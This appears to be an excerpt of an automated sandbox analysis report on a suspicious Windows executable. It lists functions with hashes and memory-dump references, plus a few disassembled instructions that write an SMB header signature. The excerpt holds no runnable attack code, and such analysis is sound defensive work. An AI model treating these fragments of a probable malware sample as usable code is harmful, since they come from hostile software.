Associated: 00000000.00000002.2643918856.000000000116F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643937713.0000000001171000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_500000_u57m8aCdwb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ffec805023411b374ca6d9e702f4b24844e9c2030f9eed9afea2f53bca9dd3d8
Instruction ID: 0a39840f7a8b8df77fa34b4967121f48e09f0559699495eb26bb1a828ef9cf46
Opcode Fuzzy Hash: ffec805023411b374ca6d9e702f4b24844e9c2030f9eed9afea2f53bca9dd3d8
Instruction Fuzzy Hash: 94C17F71605B058BC328CF29D490265FBE1FF81356F25865DD9AACF791CB34E989CB80

Function 005D0420 Relevance: .3, Instructions: 289COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2642863152.0000000000501000.00000040.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true

Associated: 00000000.00000002.2642841065.0000000000500000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642863152.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642863152.0000000000C25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642863152.0000000000C27000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643417774.0000000000C2A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000C2C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000DBC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000EC8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000ECD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643773932.0000000000FB8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643918856.000000000116F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643937713.0000000001171000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_500000_u57m8aCdwb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f57790fc9442d0c129ae6c3bd1a915ddae62763f18f3c9809363f70497540787
Instruction ID: 70fef5977db25718b262344e9ad46cc3d9a86197722b86ff664bc8d6f17ab09d
Opcode Fuzzy Hash: f57790fc9442d0c129ae6c3bd1a915ddae62763f18f3c9809363f70497540787
Instruction Fuzzy Hash: 75A1F2726083118FCB24DE2CC48072ABBE6BFC5310F59962FE5959B3D2E635DC468B81

Function 005CC770 Relevance: .3, Instructions: 270COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2642863152.0000000000501000.00000040.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true

Associated: 00000000.00000002.2642841065.0000000000500000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642863152.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642863152.0000000000C25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642863152.0000000000C27000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643417774.0000000000C2A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000C2C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000DBC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000EC8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000ECD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643773932.0000000000FB8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643918856.000000000116F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643937713.0000000001171000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_500000_u57m8aCdwb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a1c8635c48d521dcab9182743159e334c974571effb5bcfed36ba56004c7dfb4
Instruction ID: 16158c14bde9311acf6553648eb5a259682ea1b767471005cda2a0435fee66a9
Opcode Fuzzy Hash: a1c8635c48d521dcab9182743159e334c974571effb5bcfed36ba56004c7dfb4
Instruction Fuzzy Hash: 45A19231A001598FEB38DE68CC55FDA77A2FF88310F0A8529ED5D9F391EA30AD458781

Function 005CC320 Relevance: .3, Instructions: 253COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2642863152.0000000000501000.00000040.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true

Associated: 00000000.00000002.2642841065.0000000000500000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642863152.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642863152.0000000000C25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642863152.0000000000C27000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643417774.0000000000C2A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000C2C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000DBC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000EC8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000ECD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643773932.0000000000FB8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643918856.000000000116F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643937713.0000000001171000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_500000_u57m8aCdwb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c0eeedaf8239ff7268e252ad5323178cdbd80369dc2acef280077d95b3c86d7b
Instruction ID: 16386a2edf0763920d4741860278ca8c63b8d4efc52bb8a2cd54b512a8128315
Opcode Fuzzy Hash: c0eeedaf8239ff7268e252ad5323178cdbd80369dc2acef280077d95b3c86d7b
Instruction Fuzzy Hash: D8C1E571914B419BD726CF38C881BEAFBE1BF99300F109A1DE9EE96241EB707584CB51

Function 00884D40 Relevance: .3, Instructions: 253COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2642863152.0000000000501000.00000040.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true

Associated: 00000000.00000002.2642841065.0000000000500000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642863152.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642863152.0000000000C25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642863152.0000000000C27000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643417774.0000000000C2A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000C2C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000DBC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000EC8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000ECD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643773932.0000000000FB8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643918856.000000000116F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643937713.0000000001171000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_500000_u57m8aCdwb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d8886d4bb004453e1594b092fd620697630901990abcd1f34ce9c2e65725e35
Instruction ID: 8e782e97bfa77c769a8aa42b1eafa80bae127b330dd5daf28ab50b24e93452fb
Opcode Fuzzy Hash: 2d8886d4bb004453e1594b092fd620697630901990abcd1f34ce9c2e65725e35
Instruction Fuzzy Hash: BA713E2320CA660BDB35692C488037967D7FBC6324F5A9A6EE4E9C7385DA31CC429391

Function 006D6AC0 Relevance: .2, Instructions: 222COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2642863152.0000000000501000.00000040.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true

Associated: 00000000.00000002.2642841065.0000000000500000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642863152.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642863152.0000000000C25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642863152.0000000000C27000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643417774.0000000000C2A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000C2C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000DBC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000EC8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000ECD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643773932.0000000000FB8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643918856.000000000116F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643937713.0000000001171000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_500000_u57m8aCdwb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 94483191673e5ee6580e4b731c48d19297a8f8dc2df7e99eef9b90992a67a8d6
Instruction ID: 69e1880b1b647754b88dd6f7d26140a7ca1b0f20ea27900ce970ac944617ec15
Opcode Fuzzy Hash: 94483191673e5ee6580e4b731c48d19297a8f8dc2df7e99eef9b90992a67a8d6
Instruction Fuzzy Hash: A481D361D0978457D6219B39DA017FBB3E6AFA9304F099B29FD8C51213FB31BAD48312

Function 0086D430 Relevance: .2, Instructions: 205COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2642863152.0000000000501000.00000040.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true

Associated: 00000000.00000002.2642841065.0000000000500000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642863152.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642863152.0000000000C25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642863152.0000000000C27000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643417774.0000000000C2A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000C2C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000DBC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000EC8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000ECD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643773932.0000000000FB8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643918856.000000000116F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643937713.0000000001171000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_500000_u57m8aCdwb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ddb1d1a6600c198c63ae9afbb25ec60f334cf9ca409e2458c7907601e3d35f3
Instruction ID: 659b1717411923f564765e0a24234c580ad63e4838977393f5be153431649b71
Opcode Fuzzy Hash: 6ddb1d1a6600c198c63ae9afbb25ec60f334cf9ca409e2458c7907601e3d35f3
Instruction Fuzzy Hash: 1D810AB2E18B828BD3148F28C8906B6F7A0FFDA314F15571EE8E647782E7749581C781

Function 00866730 Relevance: .2, Instructions: 204COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2642863152.0000000000501000.00000040.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true

Associated: 00000000.00000002.2642841065.0000000000500000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642863152.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642863152.0000000000C25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642863152.0000000000C27000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643417774.0000000000C2A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000C2C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000DBC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000EC8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000ECD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643773932.0000000000FB8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643918856.000000000116F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643937713.0000000001171000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_500000_u57m8aCdwb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8491dfcfcd26a32125bf085fbace93b0bf30ea87ce4cdfbfe149d304f9cecc05
Instruction ID: 713a2bef400140c3b5a44978d4a51cf82c4249c9e7a4616ae8ace8c59a880332
Opcode Fuzzy Hash: 8491dfcfcd26a32125bf085fbace93b0bf30ea87ce4cdfbfe149d304f9cecc05
Instruction Fuzzy Hash: A981E572D14BD28BD3148F68C8906B6B7A0FFDA314F259B1EE8E647642F7749590C780

Function 008735B0 Relevance: .2, Instructions: 203COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2642863152.0000000000501000.00000040.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true

Associated: 00000000.00000002.2642841065.0000000000500000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642863152.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642863152.0000000000C25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642863152.0000000000C27000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643417774.0000000000C2A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000C2C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000DBC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000EC8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000ECD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643773932.0000000000FB8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643918856.000000000116F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643937713.0000000001171000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_500000_u57m8aCdwb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8eaba8dce860212fbbcd240e1d34948eb185a3f9b42e766597da0eddbb2067c7
Instruction ID: e92670d81e178be37f718245802fcf99c4e2321d7d5a0bf12149824236569287
Opcode Fuzzy Hash: 8eaba8dce860212fbbcd240e1d34948eb185a3f9b42e766597da0eddbb2067c7
Instruction Fuzzy Hash: 67715A72D087808BD7118F2888802697BA2FFD6314F24C37EE8999B35BE774DA41D742

Function 00694B60 Relevance: .2, Instructions: 166COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2642863152.0000000000501000.00000040.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true

Associated: 00000000.00000002.2642841065.0000000000500000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642863152.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642863152.0000000000C25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642863152.0000000000C27000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643417774.0000000000C2A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000C2C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000DBC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000EC8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000ECD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643773932.0000000000FB8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643918856.000000000116F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643937713.0000000001171000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_500000_u57m8aCdwb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0580f510e674893a561c5b392e7d896f39e55e7bb0826d93117151d4da9eccbb
Instruction ID: 8c7540110903fc2ac1521b52518147cd3f7d7e9ebbbc6ad43ef27aab9c0630b7
Opcode Fuzzy Hash: 0580f510e674893a561c5b392e7d896f39e55e7bb0826d93117151d4da9eccbb
Instruction Fuzzy Hash: 5B41F073F20A280BE34C99699CA526A73C297D4310F4A463DDA96C73C2ED74ED16A2C0

Function 007BAB2C Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2642863152.0000000000501000.00000040.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true

Associated: 00000000.00000002.2642841065.0000000000500000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642863152.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642863152.0000000000C25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642863152.0000000000C27000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643417774.0000000000C2A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000C2C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000DBC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000EC8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000ECD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643773932.0000000000FB8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643918856.000000000116F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643937713.0000000001171000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_500000_u57m8aCdwb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 194b1e9f7992c7b919597fa56089a32913e4a1d6ceb8f728d31f22bf67bf3837
Instruction ID: a01f258016323745b183cbe17183b0a010501b7cfd3f050075f459fc21deb05b
Opcode Fuzzy Hash: 194b1e9f7992c7b919597fa56089a32913e4a1d6ceb8f728d31f22bf67bf3837
Instruction Fuzzy Hash: 9BF0AF73B612294B93A0DDB66C002E7A3C3A3C0370F1F8565EC54D7502ED388C4686C6

Function 007BAAC0 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2642863152.0000000000501000.00000040.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true

Associated: 00000000.00000002.2642841065.0000000000500000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642863152.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642863152.0000000000C25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642863152.0000000000C27000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643417774.0000000000C2A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000C2C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000DBC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000EC8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000ECD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643773932.0000000000FB8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643918856.000000000116F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643937713.0000000001171000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_500000_u57m8aCdwb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe21089785e6a1748e56388996be618063e6c4318fc8050aa5774256bf8bb64f
Instruction ID: 320327ecc761685cf9c33f40cf4dd1e0cb404025d3b07c182d18e72d4db3d6a3
Opcode Fuzzy Hash: fe21089785e6a1748e56388996be618063e6c4318fc8050aa5774256bf8bb64f
Instruction Fuzzy Hash: 61F08C33A20B344B6360CC7A8D05197A2C797C86B0B0FC969ECA0E7206E930EC0656D1

Function 00566810 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 344COMMON

Download Yara Rule

Strings

[, xrefs: 005669E1

Memory Dump Source

Source File: 00000000.00000002.2642863152.0000000000501000.00000040.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true

Associated: 00000000.00000002.2642841065.0000000000500000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642863152.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642863152.0000000000C25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642863152.0000000000C27000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643417774.0000000000C2A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000C2C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000DBC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000EC8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000ECD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643773932.0000000000FB8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643918856.000000000116F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643937713.0000000001171000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_500000_u57m8aCdwb.jbxd

Similarity

API ID:
String ID: [
API String ID: 0-784033777
Opcode ID: 0ddc3f0992dcf0d0bef62ec105a307e8995cdbd5262a72f67e61f130ffc7f704
Instruction ID: c1683402a66abd077b92163c0a6401640cc6269c85770e8955dbac68ef5b31b2
Opcode Fuzzy Hash: 0ddc3f0992dcf0d0bef62ec105a307e8995cdbd5262a72f67e61f130ffc7f704
Instruction Fuzzy Hash: 66B14571A08391ABEB359A24C89577FBFD8FB55304F18092EE8C6C7191EB35CC848792

Source: C:\Users\user\Desktop\u57m8aCdwb.exe	Code function: mov dword ptr [ebp+04h], 424D53FFh	0_2_0056A5B0
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	Code function: mov dword ptr [ebx+04h], 424D53FFh	0_2_0056A7F0
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	Code function: mov dword ptr [edi+04h], 424D53FFh	0_2_0056A7F0
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	Code function: mov dword ptr [esi+04h], 424D53FFh	0_2_0056A7F0
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	Code function: mov dword ptr [edi+04h], 424D53FFh	0_2_0056A7F0
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	Code function: mov dword ptr [esi+04h], 424D53FFh	0_2_0056A7F0
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	Code function: mov dword ptr [ebx+04h], 424D53FFh	0_2_0056A7F0
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	Code function: mov dword ptr [ebx+04h], 424D53FFh	0_2_0056B560

